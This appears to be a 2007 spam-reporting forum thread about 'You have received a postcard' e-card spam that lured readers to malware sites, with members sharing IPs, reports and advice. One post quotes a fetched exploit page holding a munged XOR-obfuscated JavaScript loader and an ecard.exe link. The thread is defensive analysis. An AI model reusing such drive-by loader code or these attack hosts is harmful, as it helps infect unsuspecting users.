Spam: "You have received a postcard..."

[showker]

Does anyone know if the current wave of "Postcard" spam contains potential dangerous .EXE content?

I note the links all go to a download site of an EXE file, but from a Mac, I cannot tell what the file is or does.

I do know the domains "blamed" are being spoofed (eg: Postcards.com), and that of the ones we're tracking, the servers are located in Egypt, Iran and Palestine -- suggesting terrorist activity.

Any knowledge on what those EXE files actually do?

Thanks

Fred

[Farelf]

Does anyone know if the current wave of "Postcard" spam contains potential dangerous .EXE content?

I note the links all go to a download site of an EXE file, but from a Mac, I cannot tell what the file is or does.

I do know the domains "blamed" are being spoofed (eg: Postcards.com), and that of the ones we're tracking, the servers are located in Egypt, Iran and Palestine -- suggesting terrorist activity.

Any knowledge on what those EXE files actually do?

Hi Fred, only reference I've seen just lately says the tricks are in the exploit site(s), no actual payload - Postcard spam contains links to a malicious Web site - but note

Hackers haven't abandoned the practice of attaching malware to e-mail, then counting on naive users to open the file, said Friedrichs. But malware hosting sites are the trend.

Anyway, the link contains details of the "Hydra-headed 'Storm' attack". They merely want to assimilate us.

[Farelf]

Oh, and there's a "variant" A Not So Friendly Ecard

[showker]

Thank you for the response.

We are currently receiving 2 to 6 of these every 8 hours.

To "See" the postcard, they tell you to Key the following IPs

into the browser:

80.195.251.182

68.82.14.202

75.28.105.59

Since yesterday, there have been 16 different IP blocks referenced.

Today they seem to be repeating, starting over.

[Wazoo]

07/01/07 13:35:29 Browsing http://80.195.251.182/

Fetching http://80.195.251.182/ ...

GET / HTTP/1.1

Host: 80.195.251.182

Connection: close

HTTP/1.1 200 OK

Server: nginx/0.5.17

Date: Sun, 01 Jul 2007 18:30:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

X-Powered-By: PHP/5.2.1

6c3c

We are currently testing a new browser feature. If you are not able to view this ecard, please <a href="/ecard.exe">click here</a> to view in its original format.<div id="mydiv"></div><scri_pt Language='java scri_pt'> function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } var plain_str = "<major mung of data>x2f\x4f\x40\x06\x0e\x07\x06\x6b\x62\x14\x65\x0e\x0f\x06\x0f\x06\x5d\x47\x54\x52\x0e\x0f\x1d\x2c"; var xored_str = xor_str(plain_str, 38); enum(xored_str); </scri_pt>

0

Content-Expire: 600

NOTE: data munged, and some actual content 'changed' during the post/display mode 'here'

The 'interesting' bit of the "please click here" crap is basically a distraction .... letting you read, think about clicking on the link, debating on whether that's a good idea or not ....

Yet, the 'magic' of this crap is that on an unprotected, insecure system, the java scri_pt has actually already ran and done its thing .... not saying that the .exe file does anything or even exists, just that by the time the average human 'reads' that text, whatever possible damage has already occured.

For a bit of enlightenment on this storyline, there's an ancient SpamCop FAQ entry 'here' in the 'Other Places' section .. title includes the words "Follw the money" if I recall correctly ....

[Farelf]

For a bit of enlightenment on this storyline, there's an ancient SpamCop FAQ entry 'here' in the 'Other Places' section .. title includes the words "Follw the money" if I recall correctly ....

Nicely done, I didn't see the whole picture and had forgotten the previous discussion. Let's see - starting Spammers resort to new trick, trojan infected e-card with similar exposure of the scri_pt, several posts later, link to Follow the Money; or, why does my computer keep getting infested with spyware? and mention of your entry/link to same in the FAQ at http://forum.spamcop.net/forums/index.php?showtopic=2238 using the same "Follow the money ..." subtitle.

[Huldin-the-Goth]

For more information on the Greetings E-card exploit visit the SANS Internet Storm Center. The information is on the following pages:

http://isc.sans.org/diary.html?storyid=3063 which tells you what happens if you follow the links in the email to the sites and the follow up information at http://isc.sans.org/diary.html?storyid=3072

[dra007]

I already posted examples here of postcards from family and friends I have been getting 5-10 a day for the last couple of month or so, another trend is empty e-mails with pdf attachments, I don't open, of course...just report...

Don't know if they can even be classified as spam since they have a mallicious, rather than simply annoying or for profit value.. coincidentally I just reported a couple..a minute ago

maybe someone can look at these safely, I am not taking chances

http://www.spamcop.net/sc?id=z1345199084za...182f804e858812z

http://www.spamcop.net/sc?id=z1345202265z0...14057b73169417z

[rconner]

maybe someone can look at these safely, I am not taking chances

http://www.spamcop.net/sc?id=z1345199084za...182f804e858812z

http://www.spamcop.net/sc?id=z1345202265z0...14057b73169417z

First link is simply a stock spam, just using a PDF in place of the usual embedded JPG. Presumably the OCR spam filters have gotten too good ar peeking inside JPGs, so the touts have resorted to this feint. The OCR filter people will now have to accelerate their development of PDF scanning.

Second link is an example of the "postcard" stuff discussed above. Standard "social engineering" pitch from badguys who want you to run their malware. I've gotten a few of these myself. I'm also a Mac user and can't read Wintel machine language, but I have to assume that this is not safe code to run.

-- rick

[dra007]

...of the "postcard" stuff discussed above. Standard "social engineering" pitch from badguys ...

Bad thing is most of my e-mail is also filtered by postini and only few are identified as malware, here's one they defanged soon after my first post, this trojan even has postcard in the name..:

From: "PostcardsFrom.Com" <wind[at]ed.spb.ru>

Subject: You've received a postcard from a neighbour!

Virus: AUTH-HTML/Postcard.N[at]troj

[Farelf]

I checked out one of the "exploit link" type with ExpLabs linkscanner which revealed three exploits awaiting anyone following the link (which was http:// & 24.73.26.88). I reported this to abuse[at]rr.com with the linkscanner link (Check 24.73.26.88) - noticing as I researched but not mentioning to them that their IP address was also already on the SCBL as a spam source. A few hours later the exploit page was unreachable (as the link above may show - note it can't actually connect you to the website - when/if it is up - unless you do some more clicking). Haven't looked at how that IP address fared in the BL but (tentatively) there seems to be some point in manually reporting the exploit links, if the provider is half-way responsive. The linkscanner evidence should certainly be sufficient "evidence" of the provider's need to intervene.

I'm thinking the one address (even the one computer) might be part of several botnets (since in this case there was evidently a website host function and a mail sender function involved). When one worm finds another on the one computer they sometimes clear out the other but I don't know if, doubt that, this is universal behavior. Or maybe it's just the one botnet, being operated parsimoniously. The only real factor for the spamsufferer being that they are more visible and more vulnerable the more they do in terms of both/either volume and function.

[cppgenius]

Last week we added a special malware spam section to our website after receiving a swarm of YouTube spam through our spam trap. These e-mails work exactly like the GreetingCard spam e-mails.

http://www.cybertopcops.com/malware-spam.php

Now I see spammers are using Labour Day greeting cards by spoofing the link with fake msn.com and google.com URL's. I've also seen similar e-mails using "new videos" released by Velvet Revolver, Eminem, Snoop Doggy and who knows what else as the bait.

All these e-mails contain the same characteristics, they link to a malicious site (IP addresses are normally used instead of domain names), they contain spoofed URL's (not always) and every e-mail uses a catchy bait to make you click on the links. All different, but still the same.

[Farelf]

Thanks

All these e-mails contain the same characteristics, they link to a malicious site (IP addresses are normally used instead of domain names), they contain spoofed URL's (not always) and every e-mail uses a catchy bait to make you click on the links. All different, but still the same.

Indeed. And just to clarify, since a lot of people seem to think "clicking on the links" means clicking on the download link at the exploit site. No, clicking on the link (to me) means just going to the exploit site - that's all it takes if you have an exploitable system and very many people/the majority do. The "click here" on the target page is just to make you sit there long enough, smugly thinking "As if!" for the downloader program, silently and unbidden, to do its thing. Those who didn't know that are permitted some terrified screaming now.

[Wazoo]

And just to clarify, since a lot of people seem to think "clicking on the links" means clicking on the download link at the exploit site. No, clicking on the link (to me) means just going to the exploit site - that's all it takes if you have an exploitable system and very many people/the majority do.

For ecen further clarification, see Security issues beyond Windows .. which talks to all those "other" applicatioins installed that also end up placing themselves into the Registry as an item that starts up right at boot time, therefore 'always' ready to spring into action when they are 'needed' ...